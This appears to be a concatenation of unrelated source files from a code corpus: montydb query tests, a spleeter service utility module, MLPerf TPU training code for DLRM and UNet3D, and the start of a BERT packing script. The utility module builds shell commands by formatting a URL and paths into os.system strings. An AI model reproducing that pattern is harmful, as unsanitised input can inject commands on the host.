spec = {"a": {"$gt": code_0s}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert count_documents(mongo_c, spec) == 1
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
assert next(mongo_c) == next(monty_c)
@skip_if_no_bson
def test_qop_gt_27(monty_find, mongo_find):
code_1as = bson.Code("1", {"a": 5})
code_1bs = bson.Code("1", {"b": 5})
code_1cs = bson.Code("1", {"c": 5})
docs = [
{"a": code_1as},
{"a": code_1bs},
{"a": code_1cs}
]
spec = {"a": {"$gt": code_1bs}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert count_documents(mongo_c, spec) == 1
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
assert next(mongo_c) == next(monty_c)
@skip_if_no_bson
def test_qop_gt_28(monty_find, mongo_find):
regex_0 = bson.Regex("^0")
regex_a = bson.Regex("^a")
docs = [
{"a": regex_a},
]
spec = {"a": {"$gt": regex_0}}
monty_c = monty_find(docs, spec)
# Can't have RegEx as arg to predicate
with pytest.raises(OperationFailure):
next(monty_c)
@skip_if_no_bson
def test_qop_gt_29(monty_find, mongo_find):
docs = [
{"a": bson.Decimal128("1.1")},
{"a": bson.Decimal128("NaN")},
{"a": bson.Decimal128("-NaN")},
{"a": bson.Decimal128("sNaN")},
{"a": bson.Decimal128("-sNaN")},
{"a": bson.Decimal128("Infinity")},
{"a": 0},
{"a": -10.0},
{"a": 10.0},
]
spec = {"a": {"$gt": bson.Decimal128("NaN")}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert count_documents(mongo_c, spec) == 0
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
@skip_if_no_bson
def test_qop_gt_30(monty_find, mongo_find):
docs = [
{"a": bson.Decimal128("1.1")},
{"a": bson.Decimal128("NaN")},
{"a": bson.Decimal128("-NaN")},
{"a": bson.Decimal128("sNaN")},
{"a": bson.Decimal128("-sNaN")},
{"a": bson.Decimal128("Infinity")},
{"a": 0},
{"a": -10.0},
{"a": 10.0},
]
spec = {"a": {"$gt": bson.Decimal128("-NaN")}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert count_documents(mongo_c, spec) == 0
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
@skip_if_no_bson
def test_qop_gt_31(monty_find, mongo_find):
docs = [
{"a": bson.Decimal128("1.1")},
{"a": bson.Decimal128("NaN")},
{"a": bson.Decimal128("-NaN")},
{"a": bson.Decimal128("sNaN")},
{"a": bson.Decimal128("-sNaN")},
{"a": bson.Decimal128("Infinity")},
{"a": 0},
{"a": -10.0},
{"a": 10.0},
]
spec = {"a": {"$gt": bson.Decimal128("Infinity")}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert count_documents(mongo_c, spec) == 0
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
@skip_if_no_bson
def test_qop_gt_32(monty_find, mongo_find):
docs = [
{"a": bson.Decimal128("1.1")},
{"a": bson.Decimal128("NaN")},
{"a": bson.Decimal128("-NaN")},
{"a": bson.Decimal128("sNaN")},
{"a": bson.Decimal128("-sNaN")},
{"a": bson.Decimal128("Infinity")},
{"a": 0},
{"a": -10.0},
{"a": 10.0},
]
spec = {"a": {"$gt": 0}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert count_documents(mongo_c, spec) == 3
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
for i in range(3):
assert next(mongo_c) == next(monty_c)
``` |
{
"source": "jqueguiner/spleeter-as-a-service",
"score": 3
} |
#### File: spleeter-as-a-service/src/app_utils.py
```python
import os
import requests
import random
import _thread as thread
from uuid import uuid4
import urllib.parse as urlparse
import numpy as np
import zipfile
from pyunpack import Archive
from shutil import rmtree
# Imaging dependencies used by the resize/crop helpers below.
import cv2
from PIL import Image
import matplotlib.image as mpimg
def download(url, filename):
data = requests.get(url).content
with open(filename, 'wb') as handler:
handler.write(data)
return filename
def generate_random_filename(upload_directory, extension):
filename = str(uuid4())
filename = os.path.join(upload_directory, filename + "." + extension)
return filename
def clean_me(filename):
if os.path.exists(filename):
if os.path.isfile(filename):
os.remove(filename)
else:
rmtree(filename)
def clean_all(files):
for me in files:
clean_me(me)
def create_directory(path):
os.system("mkdir -p %s" % os.path.dirname(path))
def get_model_bin(url, output_path):
if not os.path.exists(output_path):
create_directory(output_path)
filename, ext = os.path.splitext(os.path.basename(urlparse.urlsplit(url).path))
        if not os.path.exists(os.path.join(output_path, filename + ext)):
print("downloading model :" + filename + ext)
cmd = "wget -O %s %s" % (output_path, url)
os.system(cmd)
return output_path
#model_list = [(url, output_path), (url, output_path)]
def get_multi_model_bin(model_list):
for m in model_list:
thread.start_new_thread(get_model_bin, m)
def unzip(path_to_zip_file, directory_to_extract_to='.'):
print("deflating model :" + path_to_zip_file)
with zipfile.ZipFile(path_to_zip_file, 'r') as zip_ref:
zip_ref.extractall(directory_to_extract_to)
def unrar(path_to_rar_file, directory_to_extract_to='.'):
print("deflating model :" + path_to_rar_file)
Archive(path_to_rar_file).extractall(directory_to_extract_to)
def resize_img_in_folder(path, w, h):
dirs = os.listdir(path)
for item in dirs:
if os.path.isfile(path+item):
im = Image.open(path+item)
f, e = os.path.splitext(path+item)
imResize = im.resize((w, h), Image.ANTIALIAS)
imResize.save(f + '.jpg', 'JPEG', quality=90)
def resize_img(path, w, h):
img = mpimg.imread(path)
img = cv2.resize(img, dsize=(w, h))
return img
def square_center_crop(image_path, output_path):
    im = Image.open(image_path)
    width, height = im.size
    new_width = min(width, height)
    new_height = new_width
    left = (width - new_width)/2
    top = (height - new_height)/2
    right = (width + new_width)/2
    bottom = (height + new_height)/2
    # Crop to the centered square and write the result to output_path.
    im.crop((int(left), int(top), int(right), int(bottom))).save(output_path)
def image_crop(image_path, output_path, x0, y0, x1, y1):
"""
The syntax is the following:
cropped = img.crop( ( x, y, x + width , y + height ) )
    x and y are the top-left coordinates on the image;
    x + width and y + height are the bottom-right coordinates of the region
    to crop, i.e. the region starts at (x, y) and spans width x height pixels.
"""
image = cv2.imread(image_path)
print(x0, y0, x1, y1)
crop = image[y0:y1, x0:x1]
print(crop)
cv2.imwrite(output_path, crop)
``` |
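These helpers are thin wrappers the service uses to stage temporary files and models. A small usage sketch, assuming the module above is saved locally as `app_utils.py` (the upload directory and file names are illustrative):
```python
import os
from app_utils import generate_random_filename, clean_all

upload_directory = "/tmp/spleeter_uploads"
os.makedirs(upload_directory, exist_ok=True)

# Reserve unique paths for an incoming audio file and a result archive.
input_path = generate_random_filename(upload_directory, "wav")
output_zip = generate_random_filename(upload_directory, "zip")

# ... the request handler would write the uploaded audio and separated stems here ...
with open(input_path, "wb") as f:
    f.write(b"")  # placeholder payload

# Remove everything once the request has been served.
clean_all([input_path, output_zip])
```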
{
"source": "jqueguiner/training_results_v1.0",
"score": 2
} |
#### File: implementations/dlrm-preview-TF-tpu-v4-256/dlrm_embedding_runner.py
```python
from absl import flags
import tensorflow.compat.v1 as tf
from REDACTED.tensorflow.python.tpu import tpu
from REDACTED.tensorflow.python.tpu import tpu_embedding_gradient
from REDACTED.tensorflow.python.tpu import tpu_function
from REDACTED.tensorflow.python.tpu import training_loop
from REDACTED.tensorflow.python.tpu.ops import tpu_ops
from REDACTED.mlperf.submissions.training.v1_0.models.util import train_and_eval_runner as tr
FLAGS = flags.FLAGS
class DLRMEmbeddingRunner(tr.TrainAndEvalRunner):
"""Augmentation of the TrainAndEvalRunner with embedding support.
This class uses the TPUEmbedding library as an API for organizing embedding
metadata for:
1. Configuration
2. Building infeed ops
    3. Building embedding table load/restore ops
4. Building an embedding update/train op.
Attributes:
sparse_features_key: String key used for all embedding features. This class
requires all embedding features to be keyed under this string. This is
necessary for the runner to properly strip away only those features and
enqueue them properly.
embedding: TPUEmbedding object representing the table and feature config.
This attribute is required.
**kwargs: See TrainAndEvalRunner.
"""
def __init__(self, sparse_features_key, embedding, **kwargs):
"""Initializes the runner."""
super(DLRMEmbeddingRunner, self).__init__(**kwargs, do_initialize=False)
self.embedding = embedding
self.embedding_config = embedding.config_proto
self.features_key = sparse_features_key
self.embed_vars_and_ops = None
self.retrieve_ops = None
self.enqueue_datas_list = {True: [], False: []}
self.dummy_variables = None
self.dummy_variables_init = None
self.num_outfeeds = 1
with self.graph.as_default():
self.embed_vars_and_ops = self.embedding.create_variables_and_ops()
self.dummy_variables, self.dummy_variables_init = (
tpu_embedding_gradient.create_dummy_table_variables(self.embedding))
self.device_topology = tf.Session(
self.master, config=self.config).run(
tpu.initialize_system(embedding_config=self.embedding_config))
def eval_step(self, step_num, preds):
"""One evaluation step."""
inp = self.infeed_op[False].generate_dequeue_op()
flatten_structure = tf.nest.flatten(self.feature_structure[False])
inp = [
tf.slice(i, [0] * i.shape.ndims, j.shape)
for i, j in zip(inp, flatten_structure)
]
eval_has_labels = False
if eval_has_labels:
features, labels = tf.nest.pack_sequence_as(self.feature_structure[False],
inp)
else:
features = tf.nest.pack_sequence_as(self.feature_structure[False], inp)
labels = None
self.maybe_add_embedding_features(features, False)
_, self.predict_output = self.model_fn(features, labels, False, step_num,
preds)
for _ in self.predict_output:
self.dequeue_ops.append([])
with tf.device(tr.device_for_tpu_core(self.get_host(0))):
return step_num + 1, self.predict_output["results"]
@tpu_function.on_device_training_loop
def eval_loop(self, _):
per_replica_eval_batch_size = self.eval_batch_size // self.num_replicas
tf.get_variable_scope().reuse_variables()
predictions = tf.zeros([self.eval_steps, per_replica_eval_batch_size, 2])
_, predictions = training_loop.repeat(
int(self.eval_steps), self.eval_step, [tf.constant(0), predictions])
with tf.control_dependencies([tpu_ops.outfeed_enqueue_tuple([predictions])
]):
return tf.no_op()
def maybe_capture_embedding_inputs(self, inputs, is_training):
"""Removes sparse inputs and stores them.
Args:
inputs: Dict of input features, resulting from iterator.get_next().
is_training: Boolean that is True for training and False otherwise.
"""
sparse_inputs = inputs.pop(self.features_key)
sparse_inputs = tf.split(sparse_inputs, sparse_inputs.shape[-1], axis=1)
sparse_inputs = [tf.squeeze(x) for x in sparse_inputs]
self.enqueue_datas_list[is_training].append(sparse_inputs)
def maybe_add_embedding_enqueue_ops_int(self, is_training, enqueue_ops):
"""Adds embedding input enqueue ops.
Args:
is_training: Boolean that is True for training and False otherwise.
enqueue_ops: List of existing enqueue ops used by the runner.
"""
sparse_enqueue_ops = []
for i, batch_data in enumerate(self.enqueue_datas_list[is_training]):
enqueue_op = tpu_ops.enqueue_tpu_embedding_integer_batch(
batch=batch_data,
device_ordinal=i % FLAGS.replicas_per_host,
mode_override="inference" if not is_training else None)
sparse_enqueue_ops.append(enqueue_op)
enqueue_ops.extend(sparse_enqueue_ops)
# Clear sparse input list for this host.
del self.enqueue_datas_list[is_training][:]
def maybe_get_embedding_train_op(self):
"""Builds embedding table update op.
Returns:
An op which computes gradients and updates tables.
"""
with tf.device(tr.device_for_tpu_core(self.get_host(0))):
sparse_grads = (
tpu_embedding_gradient.get_gradients_through_dummy_table_variables(
self.embedding))
embedding_train_op = self.embedding.generate_send_gradients_op(
sparse_grads, tf.compat.v1.train.get_global_step())
return embedding_train_op
def maybe_add_embedding_features(self, features, hook_dummy_variables):
"""Adds sparse activations to feature list.
Args:
features: Dict of features, used by the model_fn.
hook_dummy_variables: Boolean telling whether to back-propagate through
embedding activations. Set to true when training and desiring backprop
to extend to the embedding tables.
"""
if hook_dummy_variables:
with tf.device(tr.device_for_tpu_core(self.get_host(0))):
embedding_activations = self.embedding.get_activations()
new_embedding_activations = tpu_embedding_gradient.hook_dummy_table_variables_to_activations(
self.embedding, embedding_activations, self.dummy_variables)
features.update(new_embedding_activations)
else:
embedding_activations = self.embedding.get_activations()
features.update(embedding_activations)
def maybe_load_embedding_vars(self):
"""Loads tables into accelerator device memory."""
self.sess.run(self.dummy_variables_init)
self.sess.run(self.embed_vars_and_ops.load_ops())
self.retrieve_ops = self.embed_vars_and_ops.retrieve_ops()
def should_set_training_metric(self):
return False
def retrieve_embedding_vars(self):
self.sess.run(self.retrieve_ops)
```
#### File: unet3d-preview-JAX-tpu-v4-128/google/test_deterministic_input.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import REDACTED
from __future__ import print_function
import math
import time
from absl import app
from absl import flags
from absl import logging
import jax
from jax import config
import jax.numpy as jnp
from jax.util import partial
import numpy as onp
import tensorflow.compat.v2 as tf
import REDACTED.learning.deepmind.REDACTED.client.google as xm
from REDACTED.mlperf.submissions.training.v1_0.models.unet3d.data_loading import data_loader
from REDACTED.mlperf.submissions.training.v1_0.models.unet3d.data_loading import input_reader
# Import below lines so that we do not have flag errors when reusing the same
# REDACTED file.
# pylint: disable=unused-import
from REDACTED.mlperf.submissions.training.v1_0.models.unet3d.runtime import arguments
from REDACTED.mlperf.submissions.training.v1_0.models.unet3d.runtime import inference
from REDACTED.mlperf.submissions.training.v1_0.models.unet3d.runtime import training
# pylint: enable=unused-import
flags.DEFINE_string(
'init_dummy_file',
default=None,
help='Read a dummy file to initialize datacenter connection.')
flags.DEFINE_bool(
'space_filling_device_assignment', default=False,
help='Make device assignment with space filling curves.')
flags.DEFINE_bool(
'hardware_rng', default=True,
help='Enable faster RNG generation.')
flags.DEFINE_bool(
'profile', default=True,
help='Enable programmatic profile with xprof.')
flags.DEFINE_bool(
'profile_first_eval', default=True,
help='Enable programmatic profile with xprof for eval.')
flags.DEFINE_integer(
'repeat_experiment', default=1, help=('Number of runs'))
flags.DEFINE_integer(
'profile_duration', default=15, help=('Xprof profile duration'))
flags.DEFINE_integer(
'profile_latency', default=15, help=('When to start profiling.'))
flags.DEFINE_integer(
'num_partitions', default=1, help=('Number of partitions in SPMD.'))
flags.DEFINE_integer(
'num_eval_partitions', default=1, help=('Number of partitions in SPMD.'))
flags.DEFINE_string(
'experiment_name', help='name of the experiment', default='')
flags.DEFINE_string(
'experiment_dir', help='directory of the experiment', default='')
# Adds jax_log_compiles flag to print compilation logs on the jax side.
config.parse_flags_with_absl()
FLAGS = flags.FLAGS
mypmap = partial(jax.pmap, axis_name='hosts')
@mypmap
def host_psum(x):
return jax.lax.psum(x, 'hosts')
def per_host_sum_pmap(in_tree):
"""Execute sum on in_tree's leaves over ICI."""
ldc = jax.local_device_count()
def pre_pmap(x):
y = onp.zeros((ldc, *x.shape), dtype=x.dtype)
y[0] = x
return y
def post_pmap(x):
return jax.device_get(x)[0]
return jax.tree_map(post_pmap, host_psum(jax.tree_map(pre_pmap, in_tree)))
def construct_run_config():
"""Construct the run config parameters.
Returns:
A dictionary containing run parameters.
"""
if FLAGS.use_eval_device_loop:
# Eval device loop does not support spmd.
assert FLAGS.num_eval_partitions == 1
num_cores = jax.local_device_count() * jax.host_count()
num_replicas = num_cores // FLAGS.num_partitions
num_eval_replicas = num_cores // FLAGS.num_eval_partitions
dtype = jnp.bfloat16 if FLAGS.use_bfloat16 else jnp.float32
# steps_per_epoch = ceil(168 / 32) = 6 for bs=32
num_steps_per_epoch = math.ceil(FLAGS.num_train_images / FLAGS.batch_size)
  # samples_per_epoch = 6 * 32 = 192 for bs=32
samples_per_epoch = num_steps_per_epoch * FLAGS.batch_size
  # Still provide the parameters as in the original config:
  # max 10K epochs, 10K * 168 samples to converge,
  # first eval is at epoch 1000, then evaluate every 20 epochs.
  # Warmup is 1000 epochs, i.e. 168 * 1000 samples.
# start_eval_at = 1000
# epochs = 10000
# evaluate_every = 20
macro_step_sizes = []
  # first_eval_epoch = 875 = ceil(168 * 1000 / 192)
first_eval_epoch = math.ceil(FLAGS.num_train_images * FLAGS.start_eval_at /
samples_per_epoch)
# first_eval_step = 875 * 6
first_eval_step = first_eval_epoch * num_steps_per_epoch
# later_eval_epoch_frequency = 18, ceil(168 * 20 / 192)
later_eval_epoch_frequency = math.ceil(FLAGS.num_train_images *
FLAGS.evaluate_every /
samples_per_epoch)
# later_eval_step_frequency = 18 * 6 = 108
later_eval_step_frequency = later_eval_epoch_frequency * num_steps_per_epoch
# macro_step_sizes = [5250, 108]
macro_step_sizes = [first_eval_step, later_eval_step_frequency]
# 6 steps are called an epoch
# No crosshost spmd for eval.
host_eval_batch_size = FLAGS.eval_batch_size // jax.host_count()
assert host_eval_batch_size > 0
replica_eval_batch_size = FLAGS.eval_batch_size // num_eval_replicas
assert replica_eval_batch_size > 0
num_host_eval_replicas = jax.local_device_count() // FLAGS.num_eval_partitions
assert num_host_eval_replicas > 0
local_num_replicas = jax.local_device_count() // FLAGS.num_partitions
local_num_replicas = max(1, local_num_replicas)
hosts_per_replicas = FLAGS.num_partitions // jax.local_device_count()
hosts_per_replicas = max(1, hosts_per_replicas)
replica_batch_size = FLAGS.batch_size // num_replicas
replicas_per_hosts = jax.local_device_count() // FLAGS.num_partitions
replicas_per_hosts = max(1, replicas_per_hosts)
host_batch_size = replicas_per_hosts * replica_batch_size
num_eval_steps = math.ceil(
input_reader.NUM_SLIDING_WINDOWS / FLAGS.eval_batch_size)
return dict(
use_train_device_loop=FLAGS.use_train_device_loop,
use_eval_device_loop=FLAGS.use_eval_device_loop,
make_sliding_windows_in_dataset=True,
num_eval_images=FLAGS.num_eval_images,
eval_score_fn_bs=FLAGS.eval_score_fn_bs,
num_eval_steps=num_eval_steps,
# Global batch size for eval, has to be multiple of host_count.
eval_batch_size=FLAGS.eval_batch_size,
# Per host eval batch size.
host_eval_batch_size=host_eval_batch_size,
# Per replica eval batch size.
replica_eval_batch_size=replica_eval_batch_size,
# Number of global eval replicas
num_eval_replicas=num_eval_replicas,
num_host_eval_replicas=num_host_eval_replicas,
num_train_images=FLAGS.num_train_images,
num_eval_partitions=FLAGS.num_eval_partitions,
num_partitions=FLAGS.num_partitions,
use_spatial_partitioning=FLAGS.num_partitions > 1,
local_num_replicas=local_num_replicas,
hosts_per_replicas=hosts_per_replicas,
num_cores=num_cores,
macro_step_sizes=macro_step_sizes,
num_steps_per_epoch=num_steps_per_epoch,
samples_per_epoch=samples_per_epoch,
num_local_devices=jax.local_device_count(),
device_batch_size=replica_batch_size,
host_batch_size=host_batch_size,
num_replicas=num_replicas,
data_dir=FLAGS.data_dir,
epochs=FLAGS.epochs,
batch_size=FLAGS.batch_size,
layout=FLAGS.layout,
input_shape=FLAGS.input_shape,
input_shape_without_channel=FLAGS.input_shape[:-1],
val_input_shape=FLAGS.val_input_shape,
val_input_shape_without_channel=FLAGS.val_input_shape[:-1],
seed=FLAGS.seed,
exec_mode=FLAGS.exec_mode,
use_bfloat16=FLAGS.use_bfloat16,
optimizer=FLAGS.optimizer,
learning_rate=FLAGS.learning_rate,
init_learning_rate=FLAGS.init_learning_rate,
lr_warmup_epochs=FLAGS.lr_warmup_epochs,
lr_decay_epochs=FLAGS.lr_decay_epochs,
lr_decay_factor=FLAGS.lr_decay_factor,
lamb_beta1=FLAGS.lamb_betas[0],
lamb_beta2=FLAGS.lamb_betas[1],
momentum=FLAGS.momentum,
weight_decay=FLAGS.weight_decay,
evaluate_every=FLAGS.evaluate_every,
normalization=FLAGS.normalization,
activation=FLAGS.activation,
pad_mode=FLAGS.pad_mode,
oversampling=FLAGS.oversampling,
include_background=FLAGS.include_background,
dtype=dtype,
in_channels=1,
n_class=3,
shuffle_buffer_size=FLAGS.num_train_images,
interleave_cycle_length=32,
num_hosts=jax.host_count(),
host_index=jax.host_id(),
overlap=FLAGS.overlap,
eval_mode='gaussian',
padding_val=-2.2,
eval_padding_mode='constant', # to be used in eval sliding windows.
use_fake_data=FLAGS.use_fake_data,
fake_nan_data=False,
use_fake_train_data=False,
num_eval_passes=FLAGS.num_eval_passes,
eval_image_indices=FLAGS.eval_image_indices,
)
def main(argv):
# BEGIN GOOGLE-INTERNAL
xm.setup_work_unit()
# END GOOGLE-INTERNAL
del argv
tf.enable_v2_behavior()
params = construct_run_config()
logging.info('Experiment params: %s', params)
for _ in range(FLAGS.repeat_experiment):
run_unet(params)
def run_unet(params):
"""Runs a single end to end unet experiment."""
logging.info('params:%s', params)
host_id = params['host_index']
params['training_num_hosts'] = params['num_replicas']
params['training_host_index'] = 2
if FLAGS.seed >= 0:
seed = FLAGS.seed
else:
seed = onp.uint32(time.time() if host_id == 0 else 0)
seed = onp.int64(per_host_sum_pmap(seed))
tf.random.set_seed(seed)
train_dataloader, _ = data_loader.get_data_loaders(
FLAGS.data_dir, params)
train_dataset = train_dataloader(params)
train_iterator = iter(train_dataset)
for step in range(params['epochs']):
my_ti = next(train_iterator)
# pylint: disable=cell-var-from-loop
my_ti = jax.tree_map(lambda x: x.numpy(), my_ti)
# pylint: enable=cell-var-from-loop
ti = per_host_sum_pmap(my_ti)
ti = jax.tree_map(lambda x: x / params['num_hosts'], ti)
for key in ['image', 'label']:
my_ti[key] = my_ti[key] - ti[key]
diff = math.fabs(onp.sum(my_ti[key]))
if diff < 0.0001:
logging.info('step:%s host:%s key:%s np.sum(my_ti[key]):%s',
step, host_id, key, diff)
else:
logging.error('step:%s host:%s key:%s np.sum(my_ti[key]):%s', step,
host_id, key, diff)
if __name__ == '__main__':
app.run(main)
```
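`per_host_sum_pmap` above wraps `jax.lax.psum` over a `hosts` axis so every host can check that it drew identical batches. A minimal single-host sketch of the same pmap/psum pattern (the axis name and values are illustrative; it sums one scalar per local device):
```python
import jax
import numpy as np

# Every device contributes one value; psum gives each device the global sum.
psum_fn = jax.pmap(lambda x: jax.lax.psum(x, "devices"), axis_name="devices")

n = jax.local_device_count()
per_device_values = np.arange(n, dtype=np.float32)
summed = psum_fn(per_device_values)
print(summed)  # every entry equals sum(range(n))
```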
#### File: unet3d-preview-JAX-tpu-v4-128/models/losses_numpy.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import REDACTED
from __future__ import print_function
import numpy as np
def softmax(x):
return np.exp(x) / np.exp(x).sum(-1, keepdims=True)
def cross_entropy_loss(logits: np.ndarray,
one_hot_labels: np.ndarray) -> np.ndarray:
"""Returns the cross entropy loss between some logits and some labels.
Args:
logits: Output of the model.
one_hot_labels: One-hot encoded labels. Dimensions should match the logits.
Returns:
The cross entropy, averaged over the first dimension (samples).
"""
log_softmax_logits = np.log(softmax(logits))
loss = -np.sum(one_hot_labels * log_softmax_logits, axis=-1)
return np.mean(loss)
def compute_dice(prediction,
target,
to_onehot_y=True,
to_onehot_x=False,
use_softmax=True,
use_argmax=False,
include_background=False,
layout="NDHWC"):
"""Returns the dice coefficient between prediction and target.
Args:
prediction: Prediction.
target: Target.
    to_onehot_y: Whether to one-hot encode the target.
    to_onehot_x: Whether to one-hot encode the prediction.
    use_softmax: Whether to apply softmax to the prediction.
    use_argmax: Whether to apply argmax to the prediction.
    include_background: Whether to include the background channel in the score.
    layout: Data layout, either "NDHWC" or "NCDHW".
Returns:
The dice coefficient which is essentially a measure of overlap between two
samples.
"""
smooth_nr = 1e-6
smooth_dr = 1e-6
if layout == "NCDHW":
channel_axis = 1
reduce_axis = tuple(list(range(2, len(prediction.shape))))
else:
channel_axis = -1
reduce_axis = tuple(list(range(1, len(prediction.shape) - 1)))
num_pred_ch = prediction.shape[channel_axis]
if use_softmax:
prediction = softmax(prediction)
elif use_argmax:
prediction = np.argmax(prediction, axis=channel_axis)
if to_onehot_y:
target = to_one_hot(target, layout, channel_axis)
if to_onehot_x:
prediction = to_one_hot(prediction, layout, channel_axis)
if not include_background:
assert num_pred_ch > 1, \
(f"To exclude background the prediction needs more than one channel. "
f"Got {num_pred_ch}.")
if layout == "NCDHW":
target = target[:, 1:]
prediction = prediction[:, 1:]
else:
target = target[..., 1:]
prediction = prediction[..., 1:]
assert (target.shape == prediction.shape), \
(f"Target and prediction shape do not match. Target: ({target.shape}), "
f"prediction: ({prediction.shape}).")
intersection = np.sum(target * prediction, axis=reduce_axis)
target_sum = np.sum(target, axis=reduce_axis)
prediction_sum = np.sum(prediction, axis=reduce_axis)
dice = (2.0 * intersection + smooth_nr) / (
target_sum + prediction_sum + smooth_dr)
return dice
def to_one_hot(array, layout, channel_axis):
if len(array.shape) >= 5:
array = np.squeeze(array, axis=channel_axis)
array = np.array(array[..., np.newaxis] == np.arange(3), dtype=np.float32)
if layout == "NCDHW":
array = np.transpose(array, (0, 4, 1, 2, 3))
return array
def compute_dice_ce_loss(y_pred,
y_true,
to_onehot_y,
use_softmax,
layout,
include_background=False):
"""Returns the average of the dice coeffcient and cross entropy.
Args:
y_pred: Prediction.
y_true: Target.
    to_onehot_y: Whether to one-hot encode the target.
    use_softmax: Whether to apply softmax to the prediction.
    layout: Data layout, either "NDHWC" or "NCDHW".
    include_background: Whether to include the background channel in the score.
  Returns:
    The average of the dice coefficient and cross entropy.
"""
dice = 1.0 - np.mean(
compute_dice(
y_pred,
y_true,
to_onehot_y=to_onehot_y,
use_softmax=use_softmax,
include_background=include_background))
if layout == "NCDHW":
channel_axis = 1
else:
channel_axis = -1
cross_entropy = cross_entropy_loss(y_pred,
to_one_hot(y_true, layout, channel_axis))
return (dice + cross_entropy) / 2
def compute_dice_score(y_pred,
y_true,
to_onehot_y=True,
use_argmax=True,
layout="NDHWC",
include_background=False,
compute_mean_score=True):
"""CPU compute dice score."""
dice_scores = compute_dice(
y_pred,
y_true,
to_onehot_y=to_onehot_y,
to_onehot_x=True,
use_softmax=False,
use_argmax=use_argmax,
layout=layout,
include_background=include_background)
if compute_mean_score:
return np.mean(dice_scores, axis=0)
else:
return dice_scores
```
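Because these reference losses are plain NumPy, they can be exercised on a tiny synthetic volume. A quick sanity check, assuming the file above is saved locally as `losses_numpy.py` (shapes and values are made up):
```python
import numpy as np
from losses_numpy import compute_dice_ce_loss, compute_dice_score

rng = np.random.RandomState(0)

# One sample, a 4x4x4 volume, 3 classes, NDHWC layout with a trailing label channel.
logits = rng.randn(1, 4, 4, 4, 3).astype(np.float32)
labels = rng.randint(0, 3, size=(1, 4, 4, 4, 1))

loss = compute_dice_ce_loss(
    logits, labels, to_onehot_y=True, use_softmax=True, layout="NDHWC")
score = compute_dice_score(logits, labels, layout="NDHWC")
print(loss, score)  # scalar loss and per-class dice for the two foreground classes
```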
#### File: unet3d-preview-JAX-tpu-v4-128/models/unet3d.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import REDACTED
from __future__ import print_function
from flax import nn
import jax
from REDACTED.mlperf.submissions.training.v1_0.models.unet3d.models import layers
# pylint: disable=g-complex-comprehension
class Unet3D(nn.Module):
"""Unet3D class."""
def apply(self, x, in_channels, n_class, normalization, activation,
print_func=layers.ignore_print):
filters = [32, 64, 128, 256, 320]
inp = filters[:-1]
out = filters[1:]
input_dim = filters[0]
input_block = layers.InputBlock.partial(
in_channels=in_channels,
out_channels=input_dim,
normalization=normalization,
activation=activation,
print_func=print_func)
downsample_fns = [
layers.DownsampleBlock.partial(
in_channels=i,
out_channels=o,
normalization=normalization,
activation=activation,
print_func=print_func) for i, o in zip(inp, out)
]
bottleneck = layers.DownsampleBlock.partial(
in_channels=filters[-1],
out_channels=filters[-1],
normalization=normalization,
activation=activation,
print_func=print_func)
upsample_fns = [
layers.UpsampleBlock.partial(
in_channels=filters[-1],
out_channels=filters[-1],
normalization=normalization,
activation=activation,
print_func=print_func)
]
upsample_fns.extend([
layers.UpsampleBlock.partial(
in_channels=i,
out_channels=o,
normalization=normalization,
activation=activation,
print_func=print_func)
for i, o in zip(reversed(out), reversed(inp))
])
output = layers.OutputLayer.partial(in_channels=input_dim, n_class=n_class,
print_func=print_func)
# Introduce no-op jitted functions, so that profiler can show them in stacks
# pylint: disable=unnecessary-lambda,cell-var-from-loop
@jax.jit
def jinput_block(y):
return input_block(y, tensor_name="input")
x = jinput_block(x)
outputs = [x]
down_index = 0
for downsample in downsample_fns:
@jax.jit
def jdownsample(y):
return downsample(y, tensor_name="down%s" % down_index)
x = jdownsample(x)
down_index += 1
outputs.append(x)
@jax.jit
def jbottleneck(y):
return bottleneck(y, tensor_name="down%s" % down_index)
x = jbottleneck(x)
up_index = 0
for upsample, skip in zip(upsample_fns, reversed(outputs)):
@jax.jit
def jupsample(y, z):
return upsample(y, z, tensor_name="up%s" % up_index)
x = jupsample(x, skip)
up_index += 1
@jax.jit
def joutput_block(y):
return output(y, tensor_name="output")
x = joutput_block(x)
# pylint: enable=unnecessary-lambda,cell-var-from-loop
return x
```
#### File: implementations/popart/pack_pretraining_data.py
```python
import os
import time
import glob
import struct
import random
import argparse
import numpy as np
import pandas as pd
from scipy import optimize
from itertools import repeat, chain
from functools import lru_cache, reduce
from collections import defaultdict
from matplotlib import pyplot as plt
from concurrent.futures import ProcessPoolExecutor
from bert_data.pretraining_dataset import CachedDataLoader, data_file_format
@lru_cache(maxsize=None)
def packing_strategies(start, previous, target, depth):
gap = target - start
# The collection of possible strategies given the
# starting sum, the target sum, and the available depth
# strategy search is limited to increments greater or equal to previous
strategies = []
# Complete the packing with exactly 1 number
if depth == 1:
if gap >= previous:
strategies.append([gap])
# Complete the sample in "depth" steps, recursively
else:
for new in range(previous, gap + 1):
new_gap = target - start - new
if new_gap == 0:
strategies.append([new])
else:
options = packing_strategies(start + new, new, target, depth - 1)
for option in options:
if len(option) > 0:
strategies.append([new] + option)
return strategies
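# Worked example (hypothetical numbers, not taken from the BERT data): packing to a
# target length of 4 with at most 2 sequences per pack gives
#   packing_strategies(0, 1, 4, 2) -> [[1, 3], [2, 2], [4]]
# i.e. a pack is either a length-1 plus a length-3 sequence, two length-2
# sequences, or a single full-length sequence.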
def get_packing_recipe(sequence_lengths, max_sequence_length, max_sequences_per_pack=3):
# Histogram of sequence lengths
histogram, bins = np.histogram(sequence_lengths, bins=np.arange(1, max_sequence_length + 2))
print("Begin packing pass".center(80, "_"))
print(f"Unpacked mean sequence length: {sequence_lengths.mean():3.2f}")
# Make sure all strategies are recipes to pack to the correct sequence length
